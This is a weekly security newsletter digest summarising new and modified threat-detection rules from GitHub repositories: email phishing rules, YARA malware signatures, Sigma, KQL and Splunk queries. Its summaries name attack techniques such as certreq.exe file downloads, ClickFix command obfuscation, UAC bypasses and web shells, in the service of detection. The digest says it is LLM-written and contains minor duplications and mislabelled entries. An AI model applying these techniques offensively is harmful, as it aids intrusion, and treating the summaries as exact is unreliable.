Detections Digest #20251110
The issue highlights key updates from 14 repos, including 26 new and 38 modified Elastic, Splunk, Sigma, Sublime Security, Splunk, Sigma, YARA and KQL detection rules.
This week’s update highlights the most significant changes to detection rules from 14 of the 50+ monitored GitHub repositories. Between Nov 3 and Nov 10, 2025, contributors added 26 new rules and updated 38 existing ones.
Stay informed about the latest changes in detection engineering to improve your threat detection coverage and operational efficiency.
Key Takeaways
Email security detections were updated for multiple phishing and impersonation techniques. New rules identify the Gophish framework, abuse of services like Paperless Post, and malicious attachments like nested archives. Rule modifications improve detection of QR code phishing using OCR, callback scams via NLU, and nested EML attachments, while also hardening exclusions by requiring DMARC validation. (
sublime-security/sublime-rules)New YARA rules target several Windows malware families. Signatures were added for the EggStremeFuel backdoor, WeaselStore infostealer, RoningLoader trojan, SupperBackdoor, and a specific Gh0st RAT variant. Additionally, detection for the Rhadamanthys malware was broadened with new signatures for its loader and payload components. (
reversinglabs/reversinglabs-yara-rules,elastic/protections-artifacts,RussianPanda95/Yara-Rules,kevoreilly/CAPEv2)Multiple repositories added detections for Windows defense evasion tactics. New Sigma rules identify the ‘ClickFix’ and ‘FileFix’ techniques, which use excessive whitespace to obscure commands. Splunk rules now detect UAC bypass via handle duplication into system binaries like
ComputerDefaults.exe. Another new rule detects the use ofcertreq.exeas a LOLBAS for file downloads. (SigmaHQ/sigma,splunk/security_content)Coverage for cloud identity and access management was expanded. New Auth0 rules detect risky configuration changes, such as disabling adaptive MFA or granting excessive API scopes. KQL queries were added to monitor Azure AD for device registrations from new IP addresses and to audit Authentication Context usage. The M365 impossible travel rule was also updated to cover more identity services. (
auth0/auth0-customer-detections,elastic/detection-rules,jkerai1/KQL-Queries,benscha/KQLAdvancedHunting)New detections focus on correlating suspicious process and network activity. An EQL rule identifies abnormal Kerberos ticket requests by correlating port 88 network traffic with authentication events from non-standard processes. Other rules detect web browsers launched with unusual flags by unexpected parent processes, a RAT indicator, and internal endpoints connecting to network routers. (
elastic/detection-rules,splunk/security_content,Sergio-Albea-Git/Threat-Hunting-KQL-Queries)
💥 Ongoing promo: Free access to CTIChef.com CTI feeds until 2026
To mark the anniversary the anniversary of the Morris Worm, we’re making our feeds available to you for free for the rest of the year.
The CTI feeds contain all detection rules from the digests and are available as MISP and STIX/TAXII feeds, ready for direct integration into your SIEM, TIP, or SOAR solution.
Table Of Contents
sublime-security/sublime-rules (+7, ✎23)
elastic/detection-rules (+1, ✎4)
elastic/protections-artifacts (+1, ✎1)
SigmaHQ/sigma (+4)
splunk/security_content (+3, ✎2)
Corporate repositories (7)
sublime-security/sublime-rules (+7, ✎23)
+ New rules
New rules detect brand and sender impersonation for credential theft. Detections identify misused Paperless Post assets, sender impersonation via nifty.com, and survey-themed phishing campaigns found using Natural Language Understanding. (Service Abuse: Nifty.com with impersonation, Brand impersonation: Paperless Post, Brand impersonation: Survey request with credential theft indicators)
Two rules were added to detect malicious attachment delivery techniques. One identifies nested archives, specifically a RAR file within a 7z archive, used for evasion. Another detects non-standard ICS calendar files which can be used to exploit parsers or bypass filters. (Attachment: ICS file with non-Gregorian calendar scale, Attachment: 7z Archive Containing RAR File)
Detection coverage is added for a specific phishing framework and a social engineering tactic. One rule identifies Gophish framework tracking URLs. Another detects fabricated email threads sent via Salesforce Marketing Cloud to build false legitimacy. (Spam: Personalized subject and greetings via Salesforce Marketing Cloud, Credential theft: Gophish abuse with hidden tracking image)
✎ Modified rules
Detection of malicious nested emails is broadened across multiple rules. The logic was updated to identify attachments by the ‘.eml’ file extension in addition to the ‘message/rfc822’ MIME type. This change improves coverage for various threats delivered via attached emails, such as phishing, IPFS links, and corporate impersonation. (Callback phishing via extensionless rfc822 attachment, Attachment: EML file with IPFS links, Attachment: RFC822 containing suspicious file sharing language with links from untrusted sender, Impersonation: Internal corporate services, Fake voicemail notification (untrusted sender), Compensation review with QR code in attached EML)
Several rules were updated to harden exclusion logic and reduce false negatives by requiring stricter sender authentication. For HTML smuggling and brand impersonation detections, exclusions for trusted domains now mandate a passing DMARC result, treating missing results as failures. Logic for filtering Microsoft quarantine notifications was also updated to check specific sender addresses and authentication headers. (Attachment: Any HTML file (untrusted sender), Attachment: Any HTML file (unsolicited), Brand impersonation: Booking.com, Brand impersonation: Github, Predatory Academic Journal Solicitation, Brand impersonation: Coinbase)
Detection logic for various impersonation and phishing tactics was improved. Updates target e-signature lures with new keywords (’AuthentiSign’) and sender display names formatted as phone numbers. USPS impersonation detection was expanded to include sender display name analysis, and a rule was added to flag suspicious sender names in emails from ExactTarget infrastructure. (Credential phishing: Suspicious e-sign agreement document notification, Brand impersonation: USPS, Service Abuse: ExactTarget with suspicious sender indicators)
Detection of callback and QR code phishing was updated with expanded use of Optical Character Recognition (OCR) and Natural Language Understanding (NLU). Rules now apply OCR to message screenshots and images inside EML attachments to find brand names and scam keywords. NLU logic for callback scams was refined, and new logic was added to scan rendered HTML in EMLs for QR codes. (Callback phishing in body or attachment (untrusted sender), Compensation review with QR code in attached EML)
Rules for several specific phishing vectors received targeted updates. Job scam detection now checks for senders using free email providers. A rule targeting Xero abuse now identifies emails from a Mailgun ‘High Risk Pool’ header. Other updates include improved logic for detecting encrypted PDFs and scoping Outlook Express header spoofing detection to inbound mail. (Job scam (unsolicited sender), Credential phishing: Generic document sharing, Xero infrastructure abuse, Headers: Outlook Express mailer, Brand impersonation: SharePoint PDF attachment with credential theft language, Attachment: Encrypted PDF with credential theft body)
elastic/detection-rules (+1, ✎4)
+ New rules
A new EQL rule detects suspicious Kerberos activity. It correlates a network connection to port 88 from any process except ‘lsass.exe’ with a subsequent Kerberos authentication event (ID 4768 or 4769) from the same IP. This activity indicates a non-standard tool may be performing credential access or lateral movement. (Suspicious Kerberos Authentication Ticket Request)
✎ Modified rules
Detection for suspicious Microsoft 365 logins from impossible or atypical travel locations is expanded. Both rules were updated to cover more identity services by removing a restrictive filter on target IDs. One rule now uses region ISO codes for more accurate geographic checks. (M365 Identity Login from Impossible Travel Location, M365 Identity Login from Atypical Travel Location)
Two rules targeting suspicious Amazon S3 activity were refined for better accuracy. One rule now focuses only on successful ‘PutObject’ events to detect malicious JavaScript uploads. The other, for S3 bucket versioning suspension, has a more specific query and adds detailed investigation guidance for analysts. (AWS S3 Static Site JavaScript File Uploaded, AWS S3 Object Versioning Suspended)
elastic/protections-artifacts (+1, ✎1)
+ New rules
A new YARA rule detects the RoningLoader trojan on Windows systems. The rule scans files and memory, identifying a specific x86 binary signature or the combined presence of strings related to Protected Process Light (PPL) creation, ClipUp.exe usage, and silent regsvr32.exe execution. (Windows_Trojan_RoningLoader_a4e851ac)
✎ Modified rules
A new YARA rule detects a specific Gh0st RAT variant on Windows. Detection requires four combined indicators in a file or memory: a unique timestamp format, the string “[Pause Break]”, the filename “f-secure.exe”, and an “Accept-Language: zh-cn” HTTP header. (Windows_Trojan_Gh0st_9e4bb0ce)
auth0/auth0-customer-detections (+3)
+ New rules
Three new rules detect security posture degradation in Auth0. They monitor management API events for enabling cross-origin authentication, granting excessive API scopes to applications, and disabling adaptive MFA risk assessment. These detections flag risky configuration changes that could weaken security controls. (Unauthorized or Unexpected Enabling of Cross-Origin Authentication (CORS), Excessive or unexpected Management API scope grants on applications, MFA downgrade - adaptive MFA risk assessment disabled)
reversinglabs/reversinglabs-yara-rules (+2)
+ New rules
Two new YARA rules detect Windows malware. The rules identify the EggStremeFuel backdoor and the WeaselStore infostealer by matching byte patterns of malicious functions, such as C2 communications, system information gathering, and Chrome cookie theft. (Win64_Backdoor_EggStremeFuel, Win64_Infostealer_WeaselStore)
SigmaHQ/sigma (+4)
+ New rules
Three new rules detect the ‘ClickFix’ and ‘FileFix’ defense evasion techniques. These methods use extensive whitespace characters to obscure malicious commands from user view in the Windows Run dialog or File Explorer. The detections target suspicious patterns in explorer.exe command lines and modifications to the RunMRU and TypedPaths registry keys. (Suspicious Space Characters in TypedPaths Registry Path - FileFix, Suspicious Explorer Process with Whitespace Padding - ClickFix/FileFix, Suspicious Space Characters in RunMRU Registry Path - ClickFix)
A new rule detects the abuse of certreq.exe for file downloads. The detection identifies a known LOLBAS technique by looking for the specific command-line flags -Post and -config used to retrieve files from a remote HTTP server. (Suspicious CertReq Command to Download)
splunk/security_content (+3, ✎2)
+ New rules
Two new rules detect User Account Control (UAC) bypass techniques. One rule identifies suspicious handle duplication into ComputerDefaults.exe or eventvwr.exe using Sysmon ProcessAccess events. The other rule detects ComputerDefaults.exe spawning child processes, a known method for privilege escalation (T1548.002). (Windows Handle Duplication in Known UAC-Bypass Binaries, Windows ComputerDefaults Spawning a Process)
A new rule detects web browser processes running with unusual command-line flags and non-standard parent processes. This behavior can indicate malicious automation or RAT activity, such as that observed with Castle RAT. (Windows Browser Process Launched with Unusual Flags)
✎ Modified rules
An RBA rule that processes Microsoft Defender O365 alerts was modified. The Splunk query’s aggregation logic was changed by altering how the dest field is grouped, which affects the final output events. (Microsoft Defender Incident Alerts)
Detection for anonymous pipe creation via Sysmon Events 17 and 18 was tuned to reduce false positives. The update adds path exclusions for legitimate system processes in C:\Windows\system32\ and C:\Windows\syswow64\. (Windows Anonymous Pipe Activity)
Cyber OSINT Overview is a free weekly newsletter by CTIChef.com that summarizes updates from 80+ sources (government orgs, cybersecurity vendors, threat intel teams, security researchers, and cybersecurity communities) into one overview.
Personal repositories (7)
jkerai1/KQL-Queries (+1)
+ New rules
A new KQL query analyzes Microsoft Entra ID SigninLogs to map the usage of Authentication Contexts. It reports on which Conditional Access Policies mandated a specific context, which user and application triggered it, and the associated resource. This is for auditing and monitoring security policy enforcement. (Entra Identify and Map Authentication Context Usage)
RussianPanda95/Yara-Rules (+1)
+ New rules
A new YARA rule detects the SupperBackdoor malware. The rule identifies files containing four specific strings related to SOCKS initialization, data transfer errors, and a network connectivity check via ping. (SupperBackdoor)
benscha/KQLAdvancedHunting (+1)
+ New rules
A new KQL rule detects new Azure Active Directory device registrations from IP addresses not previously associated with a user’s account. It builds a 29-day baseline of user IP addresses and alerts on registrations from new IPs, excluding those from corporate ranges and common mobile operating systems to lower false positives. (Azure AD Device Registration from New IP Address)
Neo23x0/signature-base (✎6)
✎ Modified rules
Multiple YARA rules were added or modified to detect various web shells. These include PHP-based shells like Weevely, ‘h4ntu shell’, and a MySQL administration shell, identified by unique code patterns and UI elements. An ASPX shell detection was broadened by adjusting string matching logic for command execution. (Weevely_Webshell, WEBSHELL_H4ntu_Shell_Powered_Tsoi, webshell_PHP_sql, WEBSHELL_ASPX_Mar21_1)
A new YARA rule detects Portable Executable files obfuscated with a four-byte XOR key. Detection checks for the absence of the ‘MZ’ header and verifies the de-XORed ‘PE’ signature at the correct offset, targeting specific packers and crypters. (SUSP_Four_Byte_XOR_PE_And_MZ)
kevoreilly/CAPEv2 (+1, ✎1)
+ New rules
A new YARA rule detects the loader component of the Rhadamanthys malware. The logic identifies specific hexadecimal byte patterns related to the loader’s functions, including ntdll interactions and exit procedures, and requires at least two signatures to match. (RhadamanthysLoader)
✎ Modified rules
The YARA rule for the Rhadamanthys malware payload was updated to broaden detection. The change adds three new hexadecimal signatures and removes an exclusionary string condition, increasing the rule’s matching capability. (RhadamanthysLoader)
Sergio-Albea-Git/Threat-Hunting-KQL-Queries (+1)
+ New rules
A new KQL query detects internal endpoints connecting to network routers. The detection correlates device inventory, IP assignments, and network connection events to find unauthorized access or discovery activities within the network. It summarizes both successful and failed connections to identify suspicious traffic patterns. ([LM] - Internal Threat Hunting over Routers Devices)
alexverboon/Hunting-Queries-Detection-Rules (✎1)
✎ Modified rules
The KQL query for detecting obfuscated command lines was improved. It now finds URL-safe Base64 encoding and Unicode dash variants. The minimum length for Base64 detection was lowered to 20 characters, and auditpol.exe was excluded to reduce false positives. (Detection of obfuscated or encoded command lines in process events)
Feedback
Your input helps us improve! If you spot any issues, mistakes, or omissions in this digest issue, or have any other suggestions, we’d love to hear from you. Contact us at team@rulecheck.io - we value your feedback and are committed to improving the content we produce.
Disclaimer
The summaries in this brief are generated by LLM model based on the provided system and user prompts. While every effort is made to consolidate accurate and relevant insights, the model may occasionally misinterpret, misrepresent, or hallucinate information. Readers are strongly advised to verify all key points by consulting the original sources linked in the brief for complete context and accuracy.
Powered by
This digest is built with BlackStork.
Looking for a customized version of this newsletter? We’d be happy to help — contact us.